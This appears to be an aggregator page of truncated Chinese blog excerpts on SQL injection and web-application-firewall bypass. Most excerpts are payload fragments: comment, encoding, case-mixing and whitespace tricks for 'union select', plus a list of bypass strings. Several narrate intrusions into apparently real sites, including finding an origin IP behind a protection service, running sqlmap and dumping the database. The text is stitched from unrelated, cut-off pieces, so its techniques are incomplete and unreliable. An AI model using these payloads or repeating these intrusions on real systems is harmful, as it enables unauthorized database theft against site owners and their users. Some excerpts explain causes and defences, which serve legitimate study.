1.SQL注入过程中的处理# 终端payload编码------>web服务器解码-------->CGI脚本解码------>web应用解码----->数据库解码 浏览器.代理等 ISS/Apache/Tomcat php/java/asp.net xxx系统 mysql/sqlserver 硬件waf 软件waf 2.bypass方法# 2.1 服务器层面bypass# 2.1.1 IIS+ASP.URL处理# %符号的处理:会自动去掉特殊符号%,例如输入se%lect,解析出…

1.绕过空格(注释符/* */,%a0): 两个空格代替一个空格,用Tab代替空格,%a0=空格: % % %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 最基本的绕过方法,用注释替换空格: /* 注释 */ 使用浮点数: ,, ,, 2.括号绕过空格: 如果空格被过滤,括号没有被过滤,可以用括号绕过. 在MySQL中,括号是用来包围子查询的.因此,任何可以计算出结果的语句,都可以用括号包围起来.而括号的两端,可以没有多余的空格. 例如: =)and(=) 这种过滤方法常常…

0x00 sql注入的原因 sql注入的原因,表面上说是因为 拼接字符串,构成sql语句,没有使用 sql语句预编译,绑定变量. 但是更深层次的原因是,将用户输入的字符串,当成了 "sql语句" 来执行. 比如上面的 String sql = "select id,no from user where id=" + id; 我们希望用户输入的 id 的值,仅仅作为一个字符串字面值,传入数据库执行,但是当输入了: 2 or 1=1 时,其中的 or 1=1 并没有作为…

sql注入在很早很早以前是很常见的一个漏洞.后来随着安全水平的提高,sql注入已经很少能够看到了.但是就在今天,还有很多网站带着sql注入漏洞在运行.稍微有点安全意识的朋友就应该懂得要做一下sql注入过滤. SQL注入的绕过技巧有很多,具体的绕过技巧需要看具体的环境,而且很多的绕过方法需要有一个实际的环境,最好是你在渗透测试的过程中遇到的环境,否则如果仅仅是自己凭空想,那显然是不靠谱的.这篇文章就是总结我在遇到的CTF题目或者是渗透环境的过程中,所使用到的sql注入的绕过技巧,这篇文章随着自己的…

知己知彼,百战不殆 --孙子兵法 [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 本文小结 0x6 参考资料 0x0 前言 促使本文产生最初的动机是前些天在做测试时一些攻击向量被WAF挡掉了,而且遇到异常输入直接发生重定向.之前对WAF并不太了解,因此趁此机会科普一下并查阅了一些绕过WAF的方法.网上关于绕过WAF有诸多文章,但是观察之后会发现大体上绕过WAF的方法就那八.九种,…

知己知彼百战不殆 --孙子兵法 [目录] 0x00 前言 0x01 WAF的常见特征 0x02 绕过WAF的方法 0x03 SQLi Filter的实现及Evasion 0x04 延伸及测试向量示例 0x05 本文小结 0x06 参考资料 0x00 前言 笔者前几天在做测试时输入攻击向量后页面发生了重定向甚至异常输入也是重定向怀疑其中有WAF在作怪.之前对WAF接触比较少纯粹是新手趁此科普了一下并查阅了一些绕过WAF的方法.所找到的资料中主要分为两类SQL注入和XSS绕过笔者SQL注入同样是新手…

知己知彼,百战不殆 --孙子兵法 [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 本文小结 0x6 参考资料 0x0 前言 促使本文产生最初的动机是前些天在做测试时一些攻击向量被WAF挡掉了,而且遇到异常输入直接发生重定向.之前对WAF并不太了解,因此趁此机会科普一下并查阅了一些绕过WAF的方法.网上关于绕过WAF有诸多文章,但是观察之后会发现大体上绕过WAF的方法就那八.九种,…

转自腾讯 博文作者:TSRC白帽子 发布日期:2014-09-03 阅读次数:1338 博文内容: 博文作者:lol [TSRC 白帽子] 第二作者:Conqu3r.花开若相惜 来自团队:[Pax.Mac Team] 应邀参加TSRC WAF防御绕过挑战赛,由于之前曾经和Team小伙伴一起参加过安全宝WAF挑战,而且自己平时接触WAF的机会也比较多,对于WAF绕过的方法还是有一定积累的. 比赛规则就是绕过四台被tencent WAF保护的测试服务器(分别为:apache GET.apache P…

代码审计教学计划: 审计项目漏洞Demo->审计思路->完整源码框架->验证并利用漏洞 代码审计教学内容: PHP,JAVA网站应用,引入框架类开发源码,相关审计工具及插件使用 代码审计必备知识点: 环境安装搭建使用,相关工具插件安装使用,掌握前期各种漏洞原理及利用 代码审计开始前准备: 审计目标的程序名,版本,当前环境(系统,中间件,脚本语言等信息),各种插件等 代码审计挖掘漏洞根本: 可控变量及特定函数,不存在过滤或过滤不严谨存在绕过导致的安全漏洞 定点挖掘功能点: 挖掘文件上传,会…

  绕过waf分类: 白盒绕过: 针对代码审计,有的waf采用代码的方式,编写过滤函数,如下blacklist()函数所示: 1 ........ 2 3 $id=$_GET['id']; 4 5 $id=blacklist($id); 6 7 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 8 9 $result=mysql_query($sql); 10 11 $row=mysql_fetch_array($result);…

0×01 你要知道目前有哪些数据库 微软公司旗下的: Microsoft SQL server 简称 MS-SQL 或者 SQL SERVER (大型数据库操作,功能和性能异常强大)(一般也是ASP或者ASP.NET) access,微软Office系列产品之一,极小型数据库.功能和性能当然也是相当一般.性能甚至可以说是相当低(常与ASP应用交互) Oracle公司旗下的: MySQL 是一个关系型数据库管理系统(常与PHP web应用交互) Oracle Database,又名Oracle R…

昨天测试sql注入,发现个站,存在ids,一个单引号直接拦截,无论我怎么编码都不行,怕不是废了.. 灵机一动 基础探测 /*'*/ 报错 /*''*/ 返回正常 是字符串类型. 先本地测试 返回所有 返回当前 那么: 还是少用or,一个or网站直接废了. 通过报错信息发现是oracle构造payload: 出数据: 1/*'xor if(substr(user,1,1)='*',1,0) or '*/'…

注入地址:http://103.238.227.13:10087/index.php?id=1 //过滤sql $array = array('table','union','and','or','load_file','create','delete','select','update','sleep','alter','drop','truncate','from','max','min','order','limit'); foreach ($array as $value) { if (…

花括号绕过 select{x password}from{database.user} union select 1,{x 2},3 特征字符大小写绕过 UniOn SEleCt 1,2,3 MYSQL特性绕过-定义变量 union select @test=user(),2,3 双写绕过 UNunionION SEselectLECT 1,2,3,4 内联注释 /!select/: 相当于没有注释 /!12345select/: 当12345小于当前mysql版本号的时候,注释不生效,相当于s…

不要以为用了360就可以高枕无忧,直接在netcraft的site_report中找到源站服务器IP,直接SQL脱裤,甚至可获取服务器权限. 存在漏洞的网站: 手工测试存在注入点: 但是网站有360保护,没法脱裤,必须想办法绕过: 360网站卫士都是劫持域名进行流量清洗,但是如果源站服务器防护的不好可能存在绕过.于是在网上搜索,终于在netcraft上找到: 源站IP为: 222.210.108.213于是直接上sqlmap开炮: 跑出数据库,说明绕过360可以脱裤了.用户为root,还是弱口令…

目标:http://www.xxxxx.net/temp.asp?ID=10359 通过 and 1=1 and 1=2 测试发现存在拦截 首先想到 and 空格 = 可能存在触发规则 一般遇到这种情况 过滤 and 一般会考虑转换为 && 空格过滤转换为 %0a .+ 或者 /**/ = 转换为 like greatest between 这些在sqlmap 都有相应的tamper 这里经过测试发现就是过滤了 空格,转换为 /**/ 就不拦截了 由于不能进行union 注入 和报错 这里…

基本/简单绕过方法: 1.注释符 http://www.0dayhack.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4-. 2.使用大小写 http://www.0dayhack.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4-. 3.结合前面两种方法 http://www.0dayhack.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt…

=绕过 like regexp(匹配)> < (测试安全狗 ><不可以绕过) 注释+换行(%0a作为垃圾数据填充) 联合查询绕过 探测出当union select 出现时会拦截,则采用/**/加换行填充逃过(绕过先写正确的注释,再在注释中添加) 4.查询时绕过(当有括号时不用空格,避免触发特征) http://192.168.231.110/sqli/less-1/?id=-1'union/*/%0a*a*/select/**/1,2,(select/**/group_concat…

空格字符绕过 %09 TAB建(水平) %0a 新建一行,换行 %0b TAB建(垂直) %0c 新的一页 %0d return 功能 %a0 空格 %00 /**/ /*!*/./*!50009*/ # 受版本限制 内联执行 浮点数和科学计数法绕过某些WAF NULL值和 \N 绕过某些WAF 引号绕过   如果过滤了单引号,可以使用双引号.反引号或者十六进制 去重绕过 过滤逗号 join绕过 like绕过 limit offset 绕过 等号绕过 判断数据库相等:!(table_schema…

http://www.plhwin.com/2014/06/13/web-security-sql/…

# # # #WAF Bypassing Strings: /*!%55NiOn*/ /*!%53eLEct*/ ,,)-- - +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**/ /**//*!50000UNION SELECT*//**/ /**/UNION/**//*!50000SELECT*//**/ /*!50000UniON SeLeCt*/ union /*!50000%…

目录 一.宽字节注入 二.基于约束的注入 三.报错注入 四.时间盲注 五.bool盲注 六.order by的注入 六.INSERT.UPDATE.DELETE相关的注入 七.堆叠注入 八.常用绕过 九.万能密码 一.宽字节注入 原理:GBK编码.URL转码 利用mysql的一个特性,mysql在使用GBK编码的时候,会认为两个字符是一个汉字(前一个ASCII码要大于128,才到汉字的范围) 例如:' -> ' -> %5C%27 %df' -> %df' -> %df%5C%27…

背景 模拟环境还是 bWAPP,只不过这个bWAPP的SQL注入有点多,一一写意义不大,在这边就利用这个环境来尝试一些SQL注入的技巧.并研究下PHP的防御代码. 普通的bWAPPSQL注入的简单介绍 从get型search到CAPTCHA 简单级 #search http://192.168.195.195/bWAPP/sqli_1.php?title=c%%27union%20select%201,2,3,version(),database(),6,%27&action=search #s…

前言 前面我们学习了如何寻找,确认,利用SQL注入漏洞的技术,本篇文章我将介绍一些更高级的技术,避开过滤,绕开防御.有攻必有防,当然还要来探讨一下SQL注入防御技巧. 目录 第五节 避开过滤方法总结 5.1.大小写变种 5.2.URL编码 5.3.SQL注释 5.4.空字节 5.5.二阶SQL注入 第六节 探讨SQL注入防御技巧 6.1.输入验证 6.2.编码输出 正文 第五节 避开过滤方法总结 Web应用为了防御包括SQL注入在内的攻击,常常使用输入过滤器,这些过滤器可以在应用的代码中,也可以…

SQL注入总结 前言: 本文和之后的总结都是进行总结,详细实现过程细节可能不会写出来~ 所有sql语句均是mysql数据库的,其他数据库可能有些函数不同,但是方法大致相同 0x00 SQL注入原理: SQL注入实质上是将用户传入的参数没有进行严格的处理拼接sql语句的执行字符串中. 可能存在注入的地方有:登陆页面,搜索,获取HTTP头的信息(client-ip , x-forward-of),订单处理(二次注入)等 注入的参数类型:POST, GET, COOKIES, SERVER 其实只要值…

备忘录(一) 拿起小本本记下常考知识点. 常用连接词 and && %23%23 且 or || %7c%7c 或 xor 非 Access 数据库: 只能爆破表名.列名获取数据.无法用盲注等 数据主要存储在mdb.sap文件内 0x01 手工: 先判断字段数: order by xx 在使用联合查询猜测表名列名: 前后两个子查询返回的结构必须相同,且数据类型必须相同,故常用NULL 猜表:union select 1,2,3,xx 猜列:union select 1,2,password…

Web安全学习笔记 SQL注入下 繁枝插云欣 --ICML8 SQL注入小技巧 CheatSheet 预编译 参考文章 一点心得 一.SQL注入小技巧 1. 宽字节注入 一般程序员用gbk编码做开发的时候,会用 set names 'gbk' 来设定,这句话等同于 setcharacter_set_connection = 'gbk',character_set_result = 'gbk',character_set_client = 'gbk'; 漏洞发生的原因是执行了 set charac…

一.目标:编写SQL动态查询 SQL常常和程序代码一起使用.我们通常所说的SQL动态查询,是指将程序中的变量和基本SQL语句拼接成一个完整的查询语句. string sql = SELECT * FROM Person WHERE Id = $Id 我们期望$Id是一个整型,因此当数据库接收到这个请求时,$Id的值就是查询语句的一部分. SQL动态查询是有效利用数据库很自然的方法.当你使用程序内的变量来指定如何进行查询时,就是将SQL作为连接程序和数据库的桥梁.程序和数据库之间通过这种方式进行“…

前言不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动.在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏性的漏洞之一,这里我想问,我们真的了解SQL注入吗?看完本篇文章希望能让你更加深刻的认识SQL注入. 目录 第一节 注入攻击原理及自己编写注入点 1.1.什么是SQL? 1.2.什么是SQL注入? 1.3.SQL注入是怎么样产生的? 1.4.编写注入点 第二节 寻找及确认SQL注入 2.1.推理测试法 2.2.and大法和…

sql注入主要是指通过在get.post请求参数中构造sql语句,以修改程序运行时所执行的sql语句,从而实现获取.修改信息甚至是删除数据的目的,sql被注入的原因主要是代码编写的有问题(有漏洞),只要平时注意在编写与sql相关的代码时养成良好的习惯,对可能被注入的sql语句加以防范,那么在大部分情况下是可以防范sql注入的.下面看下哪些不好的编码习惯容易引起select语句被注入,并分析下防范措施. 注意:这里没有完整的php代码,可以大致假设一个场景:用户可以通过类似下面的url地址http…